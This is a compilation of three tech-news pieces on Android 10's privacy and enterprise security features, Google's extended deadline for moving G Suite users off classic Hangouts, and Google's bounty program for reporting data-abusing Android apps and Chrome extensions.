Among the privacy enhancements is finer control over how apps access the phone's location: Android 10 adds a new permission dialog that lets users choose whether an app may access location all the time, only while the app is in use (running in the foreground), or not at all.

Google has also tightened what apps learn from your contacts. When you grant an app access to contacts, Android 10 no longer supplies 'affinity information', the ranking of contacts by how recently and often you interact with them. These privacy features are not only for individual users: organizations gain more flexibility and privacy controls too, and employees using corporate-owned devices get more privacy on their work devices.

Organizations can provision company-owned devices into work profile mode through zero-touch enrollment or other methods, so that employees keep their personal use private while IT admins gain more ways to manage both company-owned and BYOD devices.

There is also a new Privacy section in Settings that gathers all the controls in one place, alongside the more granular location controls that let an app access location only while it is in use.

Android 10 brings over 50 security and privacy improvements aimed specifically at organizations and employees, including the ability for enterprises to block installation of apps from unknown sources on devices with a work profile, reducing the organization-wide risk of malware.

IT admins can also configure a private DNS resolver on a managed device and require DNS over TLS, so that DNS lookups are encrypted and the names of the sites a user visits are not leaked to the network in plaintext.

Google also appears to have listened to users who complained that phone sensors can implicitly reveal personal details. Android 10 introduces a new runtime permission, ACTIVITY_RECOGNITION, that apps must request before they can track physical activity such as step count.

Android 10 also requires location permission for apps that use certain Wi-Fi, telephony or Bluetooth functions, since those can reveal location indirectly. Another new feature, scoped storage, restricts an app's access to external storage to its own app-specific directory and the media types it needs, rather than the whole filesystem.

How Google's latest software, Android 10 takes privacy a notch higher



Hangouts, which originally launched alongside the Google+ social network, is a messaging service for collaboration between co-workers, offering video chat and voice calls in addition to text messaging.

Google+ has since been discontinued, and the company had scheduled the transition of G Suite customers from the classic Hangouts app to Meet (a more secure video meeting service with better performance than classic Hangouts) to run from May 2018 to an October 2019 deadline.

Launched in March 2017, Meet improves on the video meeting experience with better performance than classic Hangouts video calls, better security and a reliable way for guests to join meetings.

Google had planned to retire classic Hangouts once all G Suite users were migrated to the new platform, but it has now extended the deadline for G Suite customers to switch to the Hangouts Chat and Meet tools.

According to Google, the new final transition date will be “no sooner” than June 2020; it gave no more precise time frame but promised a clear announcement as the date approaches. G Suite customers who want to move to the new Hangouts sooner can still do so by requesting an invitation to the Accelerated Transition Program.

Google promises to keep improving the migration of classic Hangouts group conversations and to add new Chat features, such as read receipts, which tell a user when their messages have been read.

Migration by organizational unit is not yet available; for now, classic Hangouts group conversations can be recreated in Chat, and administrators should review the Deployment Guide and Known Limitations to decide whether the migration experience is right for their organization.

Google pledges to give advance notice once there is a definitive date, and advises customers to watch the G Suite Updates blog for news.

Google Hangouts migration deadline extended for G Suite customers



Google is grappling with the spread of data-abusing apps on its platforms, mindful of incidents like the Cambridge Analytica scandal, in which a third-party app on Facebook harvested users' data that was then sold without their consent.

To contain the problem, the company has announced an expansion of its vulnerability reward programs, launching the Developer Data Protection Reward Program (DDPRP), which pays for verifiable and unambiguous evidence of data abuse in Android apps, Chrome extensions and, now, OAuth projects.

It has also expanded the scope of the Google Play Security Reward Program (GPSRP) to cover all apps on the Play Store with over 100 million installs, and it helps the affected developers fix the reported vulnerabilities through responsible disclosure.

Getting Bounty by Finding Data-Abusive Chrome & Android Apps



When a researcher or developer reports data abuse by an Android app or Chrome extension, the offending app or extension becomes liable for removal from the Play Store or Chrome Web Store. No reward table has been published yet, but depending on the severity of the impact a report could earn as much as $50,000.

The reward is open to anyone who can provide verifiable and unambiguous evidence of data abuse, and the program is meant to help Google weed out malicious apps and Chrome extensions that abuse users' data on its platforms and to strengthen security on the Play Store.

The program opens the door for researchers to help identify and fix vulnerabilities in apps, and a developer who finds and reports an abuse in their own app will also receive a reward directly from Google. That should encourage more developers to audit their own apps and disclose possible vulnerabilities or bugs, which is the point of a bounty program that works directly with the developer community.

How to Get Bounty by finding Any Data-Abusive Chrome or Android App